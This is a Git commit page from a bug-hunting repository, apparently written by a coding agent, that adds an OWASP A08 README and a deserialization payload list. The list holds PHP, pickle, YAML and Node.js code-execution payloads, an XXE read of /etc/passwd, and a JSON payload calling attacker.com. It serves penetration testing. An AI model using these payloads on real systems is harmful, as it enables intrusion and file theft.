0x5t4l1n/hunting
1
0
Fork 0
mirror of https://github.com/0x5t4l1n/hunting.git synced 2026-05-26 19:36:33 +00:00
Code Issues Packages Projects Releases Wiki Activity

Add comprehensive OWASP Top 10 directory structure with injection payloads

Browse Source 
Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
This commit is contained in:
copilot-swe-agent[bot]
2026-01-04 18:24:32 +00:00
parent ef35e279c7
commit ab9c127df3
28 changed files with 1240 additions and 1 deletions
Download Patch File Download Diff File Expand all files Collapse all files
OWASP-Top-10/A08-Software-Data-Integrity-Failures/README.md
+14
View File
@@ -0,0 +1,14 @@
# A08 - Software and Data Integrity Failures
## Description
This relates to code and infrastructure that does not protect against integrity violations. This includes insecure deserialization, insecure CI/CD pipelines, and applications that rely on updates, plugins, or libraries from untrusted sources without integrity verification.
## Common Vulnerabilities
- Insecure deserialization
- Unverified software updates
- Insecure CI/CD pipelines
- Unsigned code execution
- Missing integrity checks
## Testing Approach
Test for deserialization vulnerabilities, analyze update mechanisms, check code signing, and verify integrity checks.
OWASP-Top-10/A08-Software-Data-Integrity-Failures/deserialization-payloads.txt
+55
View File
@@ -0,0 +1,55 @@
# Deserialization Payloads
# Java serialized object patterns
rO0ABXNy
aced0005
H4sIAAAAAAAA
# PHP serialization
O:8:"stdClass":0:{}
a:1:{i:0;s:5:"admin";}
O:4:"User":1:{s:4:"role";s:5:"admin";}
O:10:"Evil_Class":0:{}
# Python pickle
\x80\x03cos
(S'whoami'
tR.
# .NET deserialization
AAEAAAD/////
# JSON deserialization attacks
{"@type":"java.net.URL","val":"http://attacker.com"}
{"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('calc')}()"}
# YAML deserialization
!!python/object/apply:os.system ['calc']
!!python/object/new:os.system [calc]
# XML deserialization/XXE
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>
# Base64 encoded payloads
# Java: rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZQ==
# PHP: TzoxMDoiRXZpbF9DbGFzcyI6MDp7fQ==
# Gadget chains (Java)
CommonsCollections1
CommonsCollections2
CommonsCollections3
CommonsCollections4
CommonsCollections5
CommonsCollections6
Groovy1
Spring1
Spring2
# Node.js deserialization
{"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('ls')}()"}
{"__proto__":{"isAdmin":true}}
# Ruby Marshal
\x04\x08o:\x10User\x06:\x0arole:\x0aadmin